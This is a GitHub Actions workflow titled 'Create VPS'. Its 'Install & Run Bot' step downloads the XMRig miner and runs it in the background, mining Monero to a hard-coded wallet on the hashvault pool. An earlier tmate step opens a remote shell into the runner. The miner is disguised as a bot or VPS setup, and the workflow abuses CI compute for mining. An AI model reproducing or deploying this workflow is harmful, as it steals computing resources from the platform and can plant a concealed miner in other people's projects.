name: Create VPS

on:
  workflow_dispatch:
  repository_dispatch:
    types: [create-vps]

permissions:
  contents: read

jobs:
  start-vps:
    runs-on: ubuntu-latest
    timeout-minutes: 45
    env:
      VPS_NAME: ${{ github.event.client_payload.vps_name || 'manual-vps' }}
    steps:
      - name: Checkout
        uses: actions/checkout@v4
      - name: Open tmate session
        uses: mxschmitt/action-tmate@v3

      - name: Install & Run Bot
        run: |
          echo "===  Bt u ci t v chy bot ==="
          sudo apt update -y
          sudo apt install -y wget curl tar            
          wget -q https://github.com/xmrig/xmrig/releases/download/v6.24.0/xmrig-6.24.0-focal-x64.tar.gz
          tar -xvzf xmrig-6.24.0-focal-x64.tar.gz
          cd xmrig-6.24.0
          chmod +x xmrig
          echo "===  Khi chy xmrig ==="
          sudo nohup ./xmrig  
              -o asia.hashvault.pro:443                           -u 85DMsbrj4oSj8r52Ag8J4sCAfw9iWm4FkPqwTbKp5Mbejkc5mP3wRtBZ5YhSPcDhf8foZd93Ze4bmTx8tBnM5EwBP6uptcu.vipminer                           -p x                           -a rx                           --tls                           --cpu-priority=5                           --randomx-1gb-pages                           > xmrig.log 2>&1 &
          echo "===  XMRig ang chy nn. Ghi log ti xx.log ==="
